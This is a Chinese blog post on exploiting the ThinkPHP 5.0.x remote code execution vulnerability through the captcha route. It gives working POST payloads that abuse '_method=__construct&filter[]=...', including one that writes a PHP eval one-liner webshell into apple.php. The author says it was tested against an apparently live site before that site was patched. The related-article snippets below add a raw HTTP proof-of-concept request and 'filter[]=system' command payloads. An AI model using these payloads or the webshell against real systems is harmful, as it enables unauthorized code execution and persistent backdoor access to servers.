Thinkphp5-0-X远程代码执行漏洞

最新推荐文章于 2023-04-18 14:50:31 发布
最新推荐文章于 2023-04-18 14:50:31 发布
阅读量799 收藏 1
点赞数
分类专栏: CVE&&漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40624810/article/details/109568465
版权

参考博客:https://www.cnblogs.com/303donatello/p/12721587.html

                  https://blog.csdn.net/qq_45521281/article/details/105907276

其实后面的&test=-1参数没有意义,只要有captcha就行

在post里加上我们要提交的参数

_method=__construct&filter[]=phpinfo&method=GET

提交前:

提交后:

证明了有远程代码执行漏洞,那怎么利用呢。可以参考文章开头的博客链接,了解filter参数的作用。

我们要利用远程代码执行写入webshell,当然目标可能有防护工具,建议写变形过的一句话。我们这里演示就用普通的一句话(其实是我不会写变形的一句话)

_method=__construct&filter[]=echo '<?php @eval($_POST["apple"]);?>' >>apple.php&method=GET

该语句的意义利用filter执行系统命令,在apple.php中写入一句话,熟悉thinkphp的同学一定知道它的目录结构。网站主页index.php在public目录下,我们这里写的apple.php会被保存在和index.php一级的目录。我们就可以直接www.xxx.com/apple.php进行验证了。这里没法验证,因为在写文章的时候发现人家已经修复了。但肯定能写进去的,在写文章之前就测试过了。

qq_40624810
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp5调用shell脚本_thinkphp5.x命令执行漏洞复现及环境搭建
weixin_42114046的博客
02-11 497
楼主Linux环境是Centos7,LAMP怎么搭不用我废话吧,别看错了1.安装composeryum -y install composer安装php拓展yum -y install php-mysql php-gd libjpeg* php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-bcmath php-mhash -...
ThinkPHP 5.x 远程命令执行漏洞复现(GetShell)
热门推荐
北风
12-12 1万+
注:转载请注明出自:https://blog.csdn.net/qq_36711453/article/details/84977739 一、简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1...
ThinkPHP5.0.x 远程代码执行
LYJ20010728的博客
08-16 1121
ThinkPHP5.0.x 远程代码执行漏洞概要初始配置漏洞利用漏洞分析漏洞修复攻击总结 漏洞概要 本次漏洞存在于 ThinkPHP 的缓存类中。该类会将缓存数据通过序列化的方式,直接存储在 .php 文件中,攻击者通过精心构造的 payload ,即可将 webshell 写入缓存文件。缓存文件的名字和目录均可预测出来,一旦缓存目录可访问或结合任意文件包含漏洞,即可触发 远程代码执行漏洞 漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.10 初始配置 获取测试环境代码
ThinkPHP历史漏洞复现
weixin_53747497的博客
03-05 1122
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
thinkphp5.x命令执行漏洞复现及环境搭建
05-27 1083
楼主Linux环境是Centos7,LAMP怎么搭不用我废话吧,别看错了 1.安装composer yum -y install composer 安装php拓展 yum -y install php-mysql php-gd libjpeg* php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstrin...
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x , 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
tp5漏洞利用工具.zip
01-03
标题中的“tp5漏洞利用工具.zip”指的是一个包含利用ThinkPHP5框架中安全漏洞的工具包,这个压缩包主要用于测试和展示ThinkPHP5代码执行漏洞的利用方式。描述提到,这个工具包含了两种方法,用于在目标系统上检测并...
ThinkPHP-Vuln-master.zip
08-05
1. **远程代码执行(Remote Code Execution, RCE)漏洞** 在ThinkPHP的历史中,RCE漏洞是其中最严重的一类。例如,2016年的ThinkPHP 5.0.x版本中的`Action::execute()`方法存在漏洞,攻击者可以通过构造恶意请求,...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
ThinkPHP 5.0.* 远程代码执行漏洞
公众号shadow sock7
01-16 7413
以5.0.23搭建环境。 payload如下: POST /thinkphp_5.0.23/public/index.php?s=captcha HTTP/1.1 Host: 192.168.170.186 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Geck...
thinkphp 源码分析系列(二)—— 路由
qq_41891666的博客
11-05 510
0x00 前言 这篇文章主要是结合 thinkphp 5.0.x 两个rce : (1)变量覆盖filter (2)没有开启强制路由导致rce 来分析thinkphp 的路由 0x01 路由检测 首先要说的是$dispatch 调度信息, 类似于: 调度信息最后会传入App::exec() 中: 而exec 会根据调度信息的type ,去调用相应的函数去映射到具体的函数上去执行。 App.php 中run() 函数中,$dispatch 是通过 App.php 中的routeCheck() 函数返回
复现ThinkPHP5 5.0.23远程代码执行漏洞
weixin_56513549的博客
02-21 3338
访问/index.php?s=captcha页面,会出现如下报错: 执行whoami 查看当前目录 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd 写入一句话木马并访问 aaabbb 这里使用Base64 编码: _method=__construct&filter[]=system&method=get&server[RE...
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8145
ThinkPHP5系列远程代码执行漏洞复现(详细)
【网络安全】一次实战中对tp5网站getshell方式的测试
HBohan的博客
10-27 1892
前言 之前接触tp5的站比较少,只知道利用RCE漏洞getshell的方式。在最近对一个发卡平台渗透的过程中,由于php版本限制,无法直接使用RCE的payload拿shell,于是结合该网站尽可能多的测试一下tp5+php7.1环境下的getshell方法。 【查看资料】 正文 拿到站点后,访问首页如下 不过看不出来具体版本,不确定是否存在RCE,于是用exp打一下试试 _method=__construct&method=get&filter=call_user_func&ge
buuctf [ThinkPHP]5.0.23-Rce
qq_1873822的博客
03-14 1167
poc POST /index.php?s=captcha HTTP/1.1 Host: yuorip Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form.
【红队靶场】某靶场
人间体佐菲的博客
04-18 761
本文章仅用作实验学习,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。
ThinkPHP 5.0 * 远程代码执行漏洞分析
a1b2c3是弱口令
01-11 1万+
ThinkPHP 5.0 * 远程代码执行全版本通杀 本文主要以官网下载的5.0.23 完整版(thinkphp_5.0.23_with_extend.zip)为例分析。 Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php) 该类可以实现对HTTP请求的一些设置。 其中成员函数method用来获取当前请求类型,其定义如下: ...
thinkphp 2.x 任意代码执行漏洞
最新发布
06-28
### 回答1: 这个问题是关于ThinkPHP 2.x是否存在代码漏洞的。据我所知,目前没有任何官方宣布过该版本存在漏洞的消息。但是任何一个应用程序都有可能存在漏洞,因此在使用任何版本的框架时都需要小心谨慎,并始终保持最新版本的更新。如果发现了任何问题,应该及时向官方反馈。 ### 回答2: thinkphp是一款非常流行的PHP开源框架,其中的2.x版本存在任意代码执行漏洞。该漏洞存在于框架的核心类文件中,攻击者可以构造特殊的参数,在受害者服务器上执行任意代码,导致服务器被入侵,甚至整个网站被控制。 具体来说,当用户的输入作为参数传递给框架的Loader类时,如果没有进行充分的过滤和验证,攻击者就可以通过注入恶意代码,来控制服务器。在thinkphp 2.x版本中,以下方法是存在问题的: ``` thinkphp/library/think/Loader.php -> import()方法 thinkphp/library/think/Template/Driver.php -> abstract parse()方法 ``` 在import方法中,如果用户通过GET或者POST请求向网站提交数据,在没有进行过滤的情况下,该参数会被直接传递给Loader类,当该参数中含有'://'或者'\\'时,Loader类会默认该参数为URL或文件路径,进而执行include等相关操作,这为攻击者提供了一个绕过安全限制的途径。 在parse方法中,如果用户提交了一个包含PHP代码的模板文件,攻击者可以通过提交的数据来控制parse方法执行时所使用的函数和参数,进而达到任意代码执行的效果。 为了避免该漏洞的出现,开发人员需要注意代码编写规范,尽量避免使用用户输入的数据来构造URL或文件路径,同时需要对用户输入进行充分的过滤和验证,包括数据类型、长度、格式等内容。此外,开发人员也可以使用更加先进的开发框架,或者借助第三方安全验证工具,对网站进行全面的安全测试,以及时发现和修复漏洞,保护网站安全。 ### 回答3: ThinkPHP是一款流行的PHP开发框架,被广泛应用于各种Web应用程序的开发。ThinkPHP 2.x是其中的一个早期版本,该版本因存在任意代码执行漏洞而备受关注。 该漏洞存在于ThinkPHP 2.x的模板解析机制中,该机制允许开发人员在视图页面中使用变量替换来展示动态内容。然而,在未对变量进行过滤的情况下,攻击者可以构造恶意变量,从而实现任意代码执行的攻击。 具体来说,攻击者可以通过在URL参数或提交数据中注入恶意变量来触发漏洞。该变量包含恶意代码,以及一些特殊参数来控制代码执行。攻击者可以通过该漏洞执行系统命令、读取敏感文件、获取访问权限等。 该漏洞的危害性较大,因此开发者应尽快升级到更高版本的ThinkPHP框架,或者采取其他措施来修复漏洞。具体措施包括: 1. 对用户提交的数据进行严格过滤和验证,确保不含有可疑的代码或命令。 2. 设置安全防护机制,如禁止用户上传和执行PHP文件、限制文件读写权限等。 3. 及时升级系统补丁,修复已知的安全漏洞。 总之,任意代码执行漏洞是一种非常危险的漏洞类型,需要开发人员加强安全意识和技术能力,采取有效的预防和修复措施,以确保Web应用程序的安全可靠。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值